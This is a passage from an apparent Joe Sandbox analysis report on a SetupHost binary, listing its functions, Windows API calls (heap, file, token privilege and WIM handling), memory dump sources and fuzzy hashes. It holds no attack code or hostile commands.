                                                                                                                        Function 004E6690 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004E669A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378638983-0
                                                                                                                        • Opcode ID: 4f7e07d736d7583cfef3b1d65391126bc5651fec4e23adf71797718ae7a2b532
                                                                                                                        • Instruction ID: 7a1d8e39281162bbd28d2ee23b26ca15eaf36a121111a91e2005285461d192f7
                                                                                                                        • Opcode Fuzzy Hash: 4f7e07d736d7583cfef3b1d65391126bc5651fec4e23adf71797718ae7a2b532
                                                                                                                        • Instruction Fuzzy Hash: 4DD0173110824CFBCF125F12EC14D7A3FAAAB94362B044165B815491B1DB329831EA54
                                                                                                                        Function 005422E0 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 005422F2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileView
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3314676101-0
                                                                                                                        • Opcode ID: 89df03ef2ab743e024238aba8ad1f2e8c1bd4cfaf1549195e0a48d6f888e53e2
                                                                                                                        • Instruction ID: 857a964217e282fb93450f25a62685e40d7465ab248e0e8d91051b45cfc003e4
                                                                                                                        • Opcode Fuzzy Hash: 89df03ef2ab743e024238aba8ad1f2e8c1bd4cfaf1549195e0a48d6f888e53e2
                                                                                                                        • Instruction Fuzzy Hash: 46C092B224420CBFA7111A61AC09DB77F5DD7A8711B008022BF08C5422DA719D21F5B4
                                                                                                                        Function 00542370 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00542383
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 26ef1c7d7cd4e41859e315cd7bddae0d38d22f918362cee7aab58f1992a52bee
                                                                                                                        • Instruction ID: 8db03b9b9489d344bfd535091f37e0a3b5eba6aacef73d231e5c50e896016c8d
                                                                                                                        • Opcode Fuzzy Hash: 26ef1c7d7cd4e41859e315cd7bddae0d38d22f918362cee7aab58f1992a52bee
                                                                                                                        • Instruction Fuzzy Hash: 32C0023604424DBBCF125F81EC05F9A3F2AEB98761F148411FA19154718772D971FB55
                                                                                                                        Function 0054533C Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452528299-0
                                                                                                                        • Opcode ID: a7d70fdaf04f4a22fccd7cf9b02c25e8f69dbf31de9d21cef793697f672c069c
                                                                                                                        • Instruction ID: 464edc4456b000cef1a04d363cfc9e94180915183064fc9b642c8a749fa68485
                                                                                                                        • Opcode Fuzzy Hash: a7d70fdaf04f4a22fccd7cf9b02c25e8f69dbf31de9d21cef793697f672c069c
                                                                                                                        • Instruction Fuzzy Hash: 82119D71204718AFDB154F38EC1AB6E3FA9FB98762F104A15F411DB2E0DAB19C05AB90

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0052B0B2 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 233memorynativefileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FF934: towupper.MSVCRT ref: 004FF988
                                                                                                                          • Part of subcall function 004FF934: towupper.MSVCRT ref: 004FF999
                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0052B186
                                                                                                                        • NtCreateFile.NTDLL ref: 0052B1DC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000028), ref: 0052B1ED
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0052B1F4
                                                                                                                        • NtQueryInformationFile.NTDLL ref: 0052B208
                                                                                                                        • wcsncmp.MSVCRT ref: 0052B22C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0052B23F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052B246
                                                                                                                        • NtClose.NTDLL ref: 0052B24F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0052B262
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052B269
                                                                                                                        • NtClose.NTDLL ref: 0052B272
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,00000000,00523E82,?,?,?,?,?,?,00000001,?,00000000), ref: 0052B2A4
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000001,?,00000000), ref: 0052B2AB
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000001,?,00000000), ref: 0052B2B9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000001,?,00000000), ref: 0052B2CF
                                                                                                                        • NtSetInformationFile.NTDLL ref: 0052B320
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000001,?,00000000), ref: 0052B335
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,00000000), ref: 0052B33C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$FileFree$AllocCloseErrorInformationLastPathtowupper$CreateNameName_Querywcsncmp
                                                                                                                        • String ID: @$WIMSetFileShortName$\Program Files\WindowsApps\$\Windows\WinSxS\
                                                                                                                        • API String ID: 2294239984-2754016081
                                                                                                                        • Opcode ID: e84bdff0d49b13c81ea75a887cf0a8808fbd4711a1527467b1eaad57b47748ba
                                                                                                                        • Instruction ID: 45325267ca18aff1c6d84b37c92054370769e253447597557701da22bc9b3c27
                                                                                                                        • Opcode Fuzzy Hash: e84bdff0d49b13c81ea75a887cf0a8808fbd4711a1527467b1eaad57b47748ba
                                                                                                                        • Instruction Fuzzy Hash: 7971C575A00329EBEB109FA4AC58BBF7FB9BF59701F144529E905E7290E7309E049B90
                                                                                                                        Function 0054010D Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 86memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0053F3E0,00000000,005427A0,WdsSetupLogInit,00540374), ref: 0054013F
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0054014F
                                                                                                                        • TlsFree.KERNEL32 ref: 00540161
                                                                                                                        • TlsGetValue.KERNEL32 ref: 00540174
                                                                                                                        • TlsFree.KERNEL32 ref: 005401A2
                                                                                                                        • EnterCriticalSection.KERNEL32(005566F8), ref: 005401B4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 005401D8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005401DF
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,08C30AB0), ref: 005401F7
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005401FE
                                                                                                                        • LeaveCriticalSection.KERNEL32(005566F8), ref: 0054021B
                                                                                                                          • Part of subcall function 00540241: GetProcessHeap.KERNEL32(00000000,00000008,?,00540189), ref: 0054029E
                                                                                                                          • Part of subcall function 00540241: HeapFree.KERNEL32(00000000,?,00540189), ref: 005402A5
                                                                                                                          • Part of subcall function 00540241: GetProcessHeap.KERNEL32(00000000,00000000,?,00540189), ref: 005402B5
                                                                                                                          • Part of subcall function 00540241: HeapFree.KERNEL32(00000000,?,00540189), ref: 005402BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Free$Process$CriticalExceptionFilterSectionUnhandled$EnterLeaveValue
                                                                                                                        • String ID: WdsSetupLogInit$T
                                                                                                                        • API String ID: 2436732932-273790995
                                                                                                                        • Opcode ID: 4df1eda30751ac33a6d6c4cda26d971210cc0db772572aafbd066d7af760832d
                                                                                                                        • Instruction ID: aa0f482e21912162a1032a7d11c41cc38bdebb91e58381de51e1c20f2a257e78
                                                                                                                        • Opcode Fuzzy Hash: 4df1eda30751ac33a6d6c4cda26d971210cc0db772572aafbd066d7af760832d
                                                                                                                        • Instruction Fuzzy Hash: B8316B796063829BC7115F74FCAA95A3F6DFB787573541128F906932E0CB719C48EB10
                                                                                                                        Function 0051D1EE Relevance: 16.9, APIs: 9, Strings: 2, Instructions: 392memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0051D224
                                                                                                                          • Part of subcall function 00520504: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0051DF5C,00000000,00000000,00000000,?,00000000,00000000,0051E358), ref: 0052053D
                                                                                                                          • Part of subcall function 00520504: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 0052056E
                                                                                                                          • Part of subcall function 00520504: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 00520575
                                                                                                                          • Part of subcall function 00520504: GetFullPathNameW.KERNEL32(?,-00000003,00000000,?), ref: 005205AE
                                                                                                                          • Part of subcall function 00520504: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 005205EF
                                                                                                                          • Part of subcall function 00520504: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 005205F6
                                                                                                                          • Part of subcall function 00520504: SetLastError.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 00520640
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0051D242
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0051D6D6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0051D6DD
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0051D6E4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorLast$Process$FreeFullNamePath$Alloc
                                                                                                                        • String ID: Fail to read WIM header$WIMCreateFile
                                                                                                                        • API String ID: 1537709336-3419363894
                                                                                                                        • Opcode ID: 3f730c951b8e58278faee8ca24fd11fcab5a0ee39624151f3c5a7145fc2e3dab
                                                                                                                        • Instruction ID: e13b4baae0b9a50858b5170747a7541230c57bf3b20af5e9c66351d6fa3bebc0
                                                                                                                        • Opcode Fuzzy Hash: 3f730c951b8e58278faee8ca24fd11fcab5a0ee39624151f3c5a7145fc2e3dab
                                                                                                                        • Instruction Fuzzy Hash: A0D1C5347007129BEB14AB759899BBE7EB2BFD5300F094828E5598B2D2DF74CC81DB61
                                                                                                                        Function 0052C0E8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 0052C17A
                                                                                                                        • SetLastError.KERNEL32(000004D3,?,?,?,?,XQ,00A00000,00000000,00000000,?,00000001), ref: 0052C1A1
                                                                                                                        • BCryptHashData.BCRYPT(?,00523894,?,00000000,?,00000000,00000000,00000000,?,00000001), ref: 0052C206
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000001), ref: 0052C217
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000001), ref: 0052C246
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CryptDataHash__allrem
                                                                                                                        • String ID: XQ$XQ
                                                                                                                        • API String ID: 4038014144-2849533878
                                                                                                                        • Opcode ID: 01e2ed101ba917ce1b3f925ed6c4473c4f10e23a2ed7f32b4f515ebc472848a4
                                                                                                                        • Instruction ID: f754055df9dc0fff2b8d70c9bba9e7770741f98387aeb5ac63f8e14c72d76c56
                                                                                                                        • Opcode Fuzzy Hash: 01e2ed101ba917ce1b3f925ed6c4473c4f10e23a2ed7f32b4f515ebc472848a4
                                                                                                                        • Instruction Fuzzy Hash: 0E415F75E0021AABDF14CF98E881BAEBFB5BF99711F204129E901A3385DB709D01CB90
                                                                                                                        Function 005020B8 Relevance: 10.8, APIs: 7, Instructions: 250memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap$_wcsicmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3839862788-0
                                                                                                                        • Opcode ID: c22002e4d3ceda7bb932d1e6027293db74770097d7bb7e505128033cb66c5d29
                                                                                                                        • Instruction ID: 5d8472b4cc04c74f2a338895ad22e687a19d0a6b8fb5832e4a1515e0af666143
                                                                                                                        • Opcode Fuzzy Hash: c22002e4d3ceda7bb932d1e6027293db74770097d7bb7e505128033cb66c5d29
                                                                                                                        • Instruction Fuzzy Hash: C39157729087529FC722CF69C888B5FBBE8BF98754F01092DF98597290D774DD048B92
                                                                                                                        Function 00501452 Relevance: 7.6, APIs: 5, Instructions: 104memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000010,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000), ref: 00501487
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000,?,WIM\IMAGE[*]), ref: 0050148E
                                                                                                                        • RtlFreeHeap.NTDLL ref: 0050152C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000), ref: 00501539
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000,?,WIM\IMAGE[*]), ref: 00501540
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2768201423-0
                                                                                                                        • Opcode ID: 5d3349beca63afdbfa412bb8ad51bcee79ebf636a4466ab6da99a16b21899e8f
                                                                                                                        • Instruction ID: 77dea098d1bd507acc0c614829539471a635fff1fe6ffbf3a75ae1e61cd5933a
                                                                                                                        • Opcode Fuzzy Hash: 5d3349beca63afdbfa412bb8ad51bcee79ebf636a4466ab6da99a16b21899e8f
                                                                                                                        • Instruction Fuzzy Hash: F1317476900609AFCB11DFA8C884A9EBBF9FF88751F154469EA05EB350D730DE058F91
                                                                                                                        Function 005211C8 Relevance: 7.6, APIs: 5, Instructions: 90filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00000001), ref: 005211F3
                                                                                                                        • NtQueryInformationFile.NTDLL ref: 00521240
                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 00521259
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00521260
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,?), ref: 0052128A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorInformation$HandleLastQueryStatusWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 133596512-0
                                                                                                                        • Opcode ID: eb2e0193eb16400a2ba11c11f8e21bb4061f8b30b25c7f64dce653abaa07eb97
                                                                                                                        • Instruction ID: 433699224612c56107d34f8a0c092cb9d80f550714898285e0f7f29a5931ccbd
                                                                                                                        • Opcode Fuzzy Hash: eb2e0193eb16400a2ba11c11f8e21bb4061f8b30b25c7f64dce653abaa07eb97
                                                                                                                        • Instruction Fuzzy Hash: FE21E67AA04629DBCB288BA5EC549AFBFB8FF59711F10452DF803D7180DA3098018754
                                                                                                                        Function 005011E1 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,005007A0,?), ref: 00501209
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,005007A0,?,?,00000000,00000000,00000000), ref: 00501210
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00501249
                                                                                                                        • GetLastError.KERNEL32 ref: 00501253
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00501278
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastOpenPrivileges
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2672816888-0
                                                                                                                        • Opcode ID: 0ed695cf042ce6f014fb84f5857d5cd6cdcc69a20d1252898c417586831ed038
                                                                                                                        • Instruction ID: 7d4eb01d575d433a0d85218d0da9c4fdedd75cfa23ae11201f5994cf620d77ea
                                                                                                                        • Opcode Fuzzy Hash: 0ed695cf042ce6f014fb84f5857d5cd6cdcc69a20d1252898c417586831ed038
                                                                                                                        • Instruction Fuzzy Hash: 16214A72A0060EABCB00CFA9EC49AEFBFB8FB58755F104029E511E6290D7309945CB61
                                                                                                                        Function 0051A1B0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 28memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,00000000), ref: 0051A1C7
                                                                                                                          • Part of subcall function 0051B3AC: DbgPrintEx.NTDLL ref: 0051B3F2
                                                                                                                          • Part of subcall function 0051B3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 0051B400
                                                                                                                        Strings
                                                                                                                        • *ppvAlloc = RtlAllocateHeap((((PPEB)__readfsdword(((LONG)(LONG_PTR)&(((TEB *)0)->ProcessEnvironmentBlock))))->ProcessHeap), 0, cb), xrefs: 0051A1F1
                                                                                                                        • onecore\base\xml\udom_xmlwalker.h, xrefs: 0051A1D8
                                                                                                                        • $FM, xrefs: 0051A1E0
                                                                                                                        • CXmlCursor::XmlAlloc, xrefs: 0051A1E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeapPrintRaiseStatus
                                                                                                                        • String ID: $FM$*ppvAlloc = RtlAllocateHeap((((PPEB)__readfsdword(((LONG)(LONG_PTR)&(((TEB *)0)->ProcessEnvironmentBlock))))->ProcessHeap), 0, cb)$CXmlCursor::XmlAlloc$onecore\base\xml\udom_xmlwalker.h
                                                                                                                        • API String ID: 3415175580-136596860
                                                                                                                        • Opcode ID: 95284f436a336ccf174c9e814a8a94b3a91639f7f67b5c6b3bafc39462dcd28a
                                                                                                                        • Instruction ID: 5983a754e8f9b725e7306df3c2ac277679488bbb8ccf70be939982a3483cf0e6
                                                                                                                        • Opcode Fuzzy Hash: 95284f436a336ccf174c9e814a8a94b3a91639f7f67b5c6b3bafc39462dcd28a
                                                                                                                        • Instruction Fuzzy Hash: C2F0A7B5901315AFE7119F689C18A9EBFF8FB95308F108459E821A7300E779D904CB98
                                                                                                                        Function 0051C3BE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
